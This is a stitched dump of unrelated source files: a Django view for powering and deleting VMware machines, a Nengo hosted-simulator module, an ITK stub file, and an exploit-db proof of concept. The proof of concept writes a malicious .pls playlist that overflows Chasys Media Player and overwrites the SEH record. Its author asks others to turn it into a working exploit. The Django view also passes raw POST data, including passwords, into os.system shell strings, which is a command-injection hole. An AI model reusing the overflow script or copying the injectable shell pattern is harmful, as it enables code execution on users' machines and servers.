result[u"reg_list"] = unicode(reg_s, errors='ignore')
else:
result[u"reg_list"] = reg_s
power_s = ','.join(power_list)
if type(power_s) != type(u''):
result[u"power_list"] = unicode(power_s, errors='ignore')
else:
result[u"power_list"] = power_s
#print str(result)
result_json = simplejson.dumps(result)
# print "Json data is '%s'" % result_json
return HttpResponse(result_json, content_type='application/javascript')
def vm_power(request):
#json_data = "vmid=vmid_txt;power_action=power_action"
print "Power data is :" + str(request.POST)
vmid = request.POST['vmid']
ip = request.POST['ip']
user = request.POST['user']
passwd = request.POST['passwd']
is_last = request.POST['is_last']
logfile, stdfile = _log()
power_action = request.POST['power_action']
power_id = request.POST['power_id']
exec_cli_list = ['export PYTHONPATH=$PYTHONPATH:/home/will/git/;']
if str(power_action) == 'on':
exec_cli_list.append("/usr/bin/python /home/will/git/VMware/scripts/vm_poweron.py --debug info")
elif str(power_action) == 'off':
exec_cli_list.append("/usr/bin/python /home/will/git/VMware/scripts/vm_poweroff.py --debug info")
exec_cli_list.append('-i ' + ip)
exec_cli_list.append('-u ' + user)
exec_cli_list.append('-p ' + passwd)
exec_cli_list.append('-l ' + logfile)
exec_cli_list.append('--parameters vm.is_id=true vm.id=' + vmid)
exec_cli_list.append("1>" + stdfile + " 2>&1")
exec_cli = ' '.join(exec_cli_list)
print '''Exec CLI is: ''' + exec_cli
os.system(exec_cli)
result = {u"power_id":power_id, u"power_result":u"1", u"power_action":power_action, u"is_last":is_last}
#print str(result)
result_json = simplejson.dumps(result)
# print "Json data is '%s'" % result_json
return HttpResponse(result_json, content_type='application/javascript')
def vm_del(request):
#json_data = "vmid=vmid_txt;power_action=power_action"
print "Del data is :" + str(request.POST)
dis_name = request.POST['dis_name']
dis_id = request.POST['dis_id']
ip = request.POST['ip']
user = request.POST['user']
passwd = request.POST['passwd']
is_last = request.POST['is_last']
logfile, stdfile = _log()
exec_cli_list = ['export PYTHONPATH=$PYTHONPATH:/home/will/git/;']
exec_cli_list.append("/usr/bin/python /home/will/git/VMware/scripts/vm_del.py --debug info")
exec_cli_list.append('-i ' + ip)
exec_cli_list.append('-u ' + user)
exec_cli_list.append('-p ' + passwd)
exec_cli_list.append('-l ' + logfile)
exec_cli_list.append('--parameters vm.name=' + dis_name)
exec_cli_list.append("1>" + stdfile + " 2>&1")
exec_cli = ' '.join(exec_cli_list)
print '''Exec CLI is: ''' + exec_cli
os.system(exec_cli)
result = {u"del_result":u"1", u"is_last":is_last, u"dis_name":dis_name, u"dis_id":dis_id}
#print str(result)
result_json = simplejson.dumps(result)
# print "Json data is '%s'" % result_json
return HttpResponse(result_json, content_type='application/javascript')
def _log():
logdir = '/var/log/will/vm/'
fname = time.strftime('%Y%m%d%H%M%S', time.gmtime())
logfile = logdir + fname + '.log'
stdfile = logdir + fname + '.std'
return logfile, stdfile
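# Note: the os.system calls above interpolate request data straight into a
# shell string. A safer sketch (same hypothetical script paths) would pass an
# argument list to subprocess instead:
#   import subprocess
#   subprocess.call(["/usr/bin/python",
#                    "/home/will/git/VMware/scripts/vm_db.py",
#                    "--debug", "info", "-i", ip, "-u", user, "-p", passwd,
#                    "-l", logfile])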
#def connect_config(request):
# t = get_template('html/Connect/config.html')
# html = t.render(Context({'': ''}))
# # return HttpResponse(html, content_type="application/x-javascript")
# return HttpResponse(html)
#
#def connect_process(request):
# exec_cli_list = ['export PYTHONPATH=$PYTHONPATH:/home/will/git/;']
# exec_cli_list.append("nohup /usr/bin/python /home/will/git/AerohiveExpect/connect.py --debug info")
# if "type" in request.GET:
# exec_cli_list.append("-m '%s'" % request.GET["type"])
# if "port" in request.GET:
# exec_cli_list.append("--port '%s'" % request.GET["port"])
# if "ip" in request.GET:
# exec_cli_list.append("-i '%s'" % request.GET["ip"])
# if "prompt" in request.GET:
# exec_cli_list.append("--prompt '%s'" % request.GET["prompt"])
# if "user" in request.GET:
# exec_cli_list.append("-u '%s'" % request.GET["user"])
# if "passwd" in request.GET:
# exec_cli_list.append("-p '%s'" % request.GET["passwd"])
# if "timeout" in request.GET:
# exec_cli_list.append("-t '%s'" % request.GET["timeout"])
# if "logfile" in request.GET:
# exec_cli_list.append("-l '%s'" % request.GET["logfile"])
# for i in range(1, 6):
# if "cli_" + str(i) in request.GET:
# # Add "" for cr command
# exec '''exec_cli_list.append('-cr "'+request.GET['cli_%s']+'"')''' % i
# # stdout part
# stdfile = log2std(request.GET["logfile"])
# exec_cli_list.append("1>" + stdfile + " 2>&1 &")
# exec_cli = ' '.join(exec_cli_list)
# print '''Exec CLI is: ''' + exec_cli
# os.system(exec_cli)
# t = get_template('html/Connect/process.html')
# html = t.render(Context({'stdfile':stdfile, 'logfile':request.GET["logfile"]}))
# # return HttpResponse(html, content_type="application/x-javascript")
# return HttpResponse(html)
#
#
#def connect_process_longpull(request):
# c_re = re.compile('Connect Part Done')
# print "Connect long pull post data is '%s'" % str(request.POST)
# if request.POST.has_key('logfile'):
# logfile = request.POST['logfile']
# # stdout part
# stdfile = request.POST['stdfile']
# # print "Logfile is '%s'" % logfile
# # print "stdfile is '%s'" % stdfile
# with open(logfile) as l_o:
# l_r = re.sub(r'\n', r'</br>', l_o.read())
# with open(stdfile) as s_o:
# s_r = re.sub(r'\n', r'</br>', s_o.read())
# # print "Logfile is '%s'" % l_r
# # print "stdfile is '%s'" % s_r
# '''
# "UnicodeDecodeError: 'utf8' codec can't decode byte...
# unicode the data first
# '''
# result = {u"log":unicode(l_r, errors='ignore'), u"std":unicode(s_r, errors='ignore')}
# if c_re.search(s_r):
# result[u'is_end'] = u'y'
# else:
# result[u'is_end'] = u'n'
# #print str(result)
# result_json = simplejson.dumps(result)
# # print "Json data is '%s'" % result_json
# return HttpResponse(result_json, content_type='application/javascript')
# else:
# print "JS response has no logfile part"
#
#def connect_success(request):
# render_to_response('html/Connect/success.html', {})
#
#def connect_fail(request):
# render_to_response('html/Connect/fail.html', {})
| [
"[email protected]"
] | |
134ea0ae19f609e515c711126a5c421c4f2b288a | 850c6fd59110bbdd89a28a2ebd117be04ce3917a | /nengo_normal_form/hosted.py | 4cbcbcb5084393bea9907aeb717900c91f30748e | [
"MIT"
] | permissive | tcstewar/nengo_normal_form | e56b35b5cb36a0ed659528ab83e1116bda3dfb32 | 37ca02b20c4cc143a7bf9c27912ead36d23a04d7 | refs/heads/master | 2021-01-01T19:44:39.556970 | 2018-05-15T22:08:06 | 2018-05-15T22:08:06 | 98,668,081 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,597 | py | import nengo_normal_form
import nengo
import numpy as np
from .generic import GenericSimulator
class Host2Client(nengo.Node):
def __init__(self, conn):
self.latest_time = 0
self.latest_x = np.zeros(conn.size_out)
super(Host2Client, self).__init__(self.update,
size_in=conn.post_obj.size_in,
size_out=0)
self.post_slice = conn.post_slice
def update(self, t, x):
self.latest_time = t
self.latest_x = x[self.post_slice]
class Client2Host(nengo.Node):
def __init__(self, conn):
super(Client2Host, self).__init__(self.update,
size_in=0,
size_out=conn.size_out)
self.value = np.zeros(conn.size_out)
def update(self, t):
return self.value
class HostedSimulator(GenericSimulator):
def __init__(self, model, dt=0.001, progress_bar=True):
super(HostedSimulator, self).__init__(dt=dt, progress_bar=progress_bar)
norm_model, probes = nengo_normal_form.convert(model)
self.host2client = {}
self.client2host = {}
self.client_conns = []
self.client_objs = []
host_model = nengo.Network()
for node in norm_model.nodes:
if self.is_on_host(node):
host_model.nodes.append(node)
else:
self.client_objs.append(node)
for ens in norm_model.ensembles:
if self.is_on_host(ens):
host_model.ensembles.append(ens)
else:
self.client_objs.append(ens)
for c in norm_model.connections:
host_pre = self.is_on_host(c.pre_obj)
host_post = self.is_on_host(c.post_obj)
if host_pre:
if host_post:
host_model.connections.append(c)
else:
with host_model:
self.host2client[c] = Host2Client(c)
nengo.Connection(
c.pre,
self.host2client[c],
synapse=c.synapse,
transform=c.transform,
function=c.function,
label=c.label)
else:
if host_post:
with host_model:
self.client2host[c] = Client2Host(c)
nengo.Connection(
self.client2host[c],
c.post,
synapse=c.synapse,
transform=c.transform,
label=c.label)
else:
self.client_conns.append(c)
self.host = nengo.Simulator(host_model, progress_bar=False)
for p, pnode in probes.items():
self.data[p] = pnode.data
def step(self):
self.host.step()
super(HostedSimulator, self).step()
def is_on_host(self, obj):
if isinstance(obj, nengo_normal_form.DecoderNode):
return False
if isinstance(obj, nengo.Node):
return True
if isinstance(obj, nengo.Ensemble):
if isinstance(obj.neuron_type, nengo.Direct):
return True
else:
return False
raise nengo.exceptions.NengoException(
'Unhandled connection to/from %s' % obj)
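# Minimal usage sketch (hypothetical model; assumes the GenericSimulator base
# provides the step()-based execution used above):
#   with nengo.Network() as model:
#       stim = nengo.Node(0.5)
#       ens = nengo.Ensemble(50, dimensions=1)
#       nengo.Connection(stim, ens)
#   sim = HostedSimulator(model, dt=0.001)
#   for _ in range(1000):
#       sim.step()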
| [
"[email protected]"
] | |
00104352c1370d91932fa8d8269ab961641f0546 | 5201e237c0d58cdfdbc2fdf8103f9141161eb9f8 | /ITKFastMarchingPython.pyi | 29ae0da83b4f80330b389cd611cb717d8648dacb | [] | no_license | hjmjohnson/itk-stubs | 704f5b92a755e55b81d02fcad62a366143e125f3 | 771951d007ae425b758e088eae6f9e4ca0e4afb1 | refs/heads/main | 2023-01-22T05:50:33.649088 | 2020-12-04T01:31:09 | 2020-12-04T01:35:06 | 318,368,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 788 | pyi | from itk.itkLevelSetNodePython import *
from itk.itkNodePairPython import *
from itk.itkFastMarchingStoppingCriterionBasePython import *
from itk.ITKFastMarchingBasePython import *
from itk.itkFastMarchingImageFilterBasePython import *
from itk.itkFastMarchingExtensionImageFilterPython import *
from itk.itkFastMarchingImageFilterPython import *
from itk.itkFastMarchingImageToNodePairContainerAdaptorPython import *
from itk.itkFastMarchingReachedTargetNodesStoppingCriterionPython import *
from itk.itkFastMarchingThresholdStoppingCriterionPython import *
from itk.itkFastMarchingUpwindGradientImageFilterPython import *
from itk.itkFastMarchingUpwindGradientImageFilterBasePython import *
from typing import Any
class _SwigNonDynamicMeta(type):
__setattr__: Any = ...
swig: Any
| [
"[email protected]"
] | |
0a32b3ef2fb132f35bbac420ae65c23c9a600a2d | 4dc0b92ae40c4bb90e4549732cab8b1f2d4305c6 | /platforms/windows/dos/8232.py | c9204be6911fdfac7062141a0fd3580830f5263a | [] | no_license | xiaohen/exploit-database | be462a39978d6309ae98677e662dc8b228f936a8 | d02449c714d2df225eba6f55b65d9840e6d19a5f | refs/heads/master | 2021-01-17T10:00:13.535969 | 2014-03-02T04:29:43 | 2014-03-02T04:29:43 | 17,334,511 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | #!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH and next SEH are overwritten, but the shellcode is not executed!
# I have tried a lot of addresses.
# Waiting for a working exploit from someone.
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print " Discovered By : zAx"
print " Contact : [email protected]"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*2024
next_seh = "\x42"*4
seh = "\x43"*4
other_data = "\xCC"*800
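# Layout sketch (offsets as found by the original author): 2024 filler bytes
# reach the SEH record, the next 4 bytes land in the "next SEH" pointer and
# the following 4 bytes in the SEH handler; the trailing 0xCC bytes are int3
# padding where a payload would go.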
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]
| [
"[email protected]"
] |